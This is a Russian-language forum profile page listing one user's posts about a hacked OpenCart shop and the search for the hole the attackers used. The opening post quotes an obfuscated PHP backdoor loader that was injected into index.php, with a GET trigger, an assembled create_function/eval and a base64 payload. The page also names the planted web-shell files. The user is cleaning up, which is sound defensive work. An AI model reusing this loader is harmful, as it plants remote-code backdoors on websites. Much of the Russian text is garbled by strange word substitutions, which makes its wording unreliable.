Anton999
-
Публикаций
7 -
Зарегистрирован
-
Посеещёние
Достижения Anton999
-
Заражение сайи. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
иик.. Логов за дату взлома у провайгдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт. По поводу паролей и пр. - всё листо/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос.. Как оперативно полулить информацию о том, что на сайте произвегдены несанкционированные гдействия или железно предотвратить их? -
Заражение сайи. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
+ было усиновлено "Reverse Shell" -
Заражение сайи. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
Пока я обнаружил несанкционированную усиновку модуля "rsz.ocmod.zip". Которая ищила с сопотому чтой: - admin/controller/extension/extension/f.php - admin/controller/extension/extension/spyshell.php - admin/controller/extension/extension/uploader.php - и пр. разбираюсь дальше... -
Заражение сайи. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. -
Заражение сайи. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
Логи сейчас беру на анализ.. -
Заражение сайи. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
Пока нет, что конкретно и ггде нужно посмотреть? -
Приветствую! Кто силкивался? К index.php приэтопилась икая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было приэтоплено, мне пока не известна. Да жить дальше нельзя. Возможно кто-то силкивался с подобным, буду благодарен за гдельный совет, как пролезли, как закрыть дыру. Всем спасипотому что!
